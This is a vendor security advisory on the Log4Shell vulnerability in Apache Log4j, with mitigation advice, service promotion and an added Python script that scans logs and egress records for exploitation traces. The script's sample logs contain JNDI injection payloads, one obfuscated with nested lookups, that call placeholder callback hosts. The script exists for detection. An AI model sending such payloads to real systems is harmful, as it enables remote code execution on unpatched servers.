A widespread, critical and easy-to-exploit vulnerability has been discovered in Apache Log4j, a commonly used logging tool. MITRE has designated this vulnerability CVE-2021-44228 and has given it the highest possible CVSS severity score of 10.0.
Below you can find Group-IB's recommendations to mitigate this vulnerability and protect your organization.
What is the Log4Shell vulnerability?
A deserialization vulnerability in the Log4j logging tool, which is used to aid debugging and metrics, has been discovered and requires immediate attention from security teams in organizations of every size and industry. Log4j is not a distinct application; it is a software component embedded in a wide variety of services, which makes identifying and patching vulnerable versions of Log4j within an organization challenging. Furthermore, even if publicly accessible applications are not themselves vulnerable, logging services downstream of them can be compromised by the exploit.
To date, most known Log4j attacks have been automated and exploratory; however, it is believed that ransomware gangs such as Conti may have begun using the exploit for lateral movement.
Organizations are urged to perform mitigating actions as soon as possible to prevent:
- Disruption to operations
- Reputational damage
- Response and recovery costs
- Disclosure announcements if there is a breach
Group-IB’s recommendations
Remediation:
- Update and patch impacted applications where possible within 24 hours.
Workarounds and mitigations:
- Prohibit direct Internet communication (TCP/UDP and HTTP) from important information systems. Outbound connectivity is the primary way the payload is delivered to the system, so blocking it breaks the full kill chain even if an attacker succeeds with the initial stage by poisoning the logs.
- Restrict DNS resolution on important systems, potentially using static host files. Even where such systems already have TCP/UDP/HTTP connectivity disabled, attackers can sometimes leverage DNS exfiltration to gain access to critical segments.
- Examine the component lists of the products and services used in the organization to detect use of the Log4j library, and update the library.
- Examine your logs for exploitation traces with YARA rules. If something is found, examine successful network communications with the domain names listed in the traces.
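The two-step check described in the last item, as an added example that is not part of Group-IB's advisory and does not use its YARA rules: a regex stands in for the rule, the log lines and egress records are constructed samples, and host names and addresses are placeholders.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample access-log lines (not real traffic). The third line nests the
# lookup inside ${lower:...} wrappers, which plain substring matching would miss.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Dec/2021:03:15:22 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://callback.example.net:1389/a}"
10.0.0.9 - - [11/Dec/2021:03:16:01 +0000] "GET /api HTTP/1.1" 500 0 "-" "${${lower:j}ndi:${lower:rmi}://203.0.113.7/x}"
10.0.0.12 - - [11/Dec/2021:03:17:40 +0000] "GET /docs HTTP/1.1" 200 4096 "-" "curl/7.79.1"
"""

# Constructed outbound-connection records, e.g. from a proxy or egress firewall:
# (internal source host, destination, outcome).
SAMPLE_EGRESS: List[Tuple[str, str, str]] = [
    ("app-01", "callback.example.net", "allowed"),
    ("app-02", "203.0.113.7", "blocked"),
    ("app-03", "updates.example.org", "allowed"),
]

NESTED = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/:}\s]+)", re.IGNORECASE)


def normalise(line: str) -> str:
    """Unwrap ${lower:x}/${upper:x} wrappers repeatedly so the lookup appears in plain form."""
    prev = None
    while prev != line:
        prev, line = line, NESTED.sub(lambda m: m.group(1), line)
    return line


def find_traces(log_text: str) -> List[Dict[str, object]]:
    """Step one: one record per log line carrying a JNDI lookup, with scheme and target host."""
    hits: List[Dict[str, object]] = []
    for n, raw in enumerate(log_text.splitlines(), start=1):
        m = JNDI.search(normalise(raw))
        if m:
            hits.append({"line": n, "scheme": m.group(1).lower(), "host": m.group(2)})
    return hits


def successful_callbacks(traces: List[Dict[str, object]],
                         egress: List[Tuple[str, str, str]]) -> Set[str]:
    """Step two: hosts from the traces that an internal system actually reached."""
    wanted = {str(t["host"]).lower() for t in traces}
    return {dst for _, dst, outcome in egress if dst.lower() in wanted and outcome == "allowed"}
```

A non-empty result from successful_callbacks means the poisoned log entry was followed by a completed outbound connection, which is the case the advisory says to examine further.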
Group-IB offers a range of products and services to help organizations that need assistance:
| Use case | Group-IB’s product/service |
|---|---|
| Find out whether the vulnerability has already been exploited as an attack vector | Group-IB Compromise Assessment |
| Ensure that vulnerabilities are mitigated and no longer pose a threat | Group-IB Security Assessment and Testing |
| Detect attempts to run the exploit and compromise the organization's network | Group-IB Managed Extended Detection and Response |
| Identify post-exploitation techniques applied by attackers | Group-IB Managed Extended Detection and Response |
| Get rapid response to stop the attack and conduct a detailed analysis of the incident | Group-IB Incident Response Retainer |
Further information
Group-IB products, services and infrastructure have been verified as safe and not vulnerable to this exploit.
Useful links and references:
- CISA vulnerability guidance
- NCSC board guidance
- NIST vulnerability database
- MITRE vulnerability information
- Apache Log4j support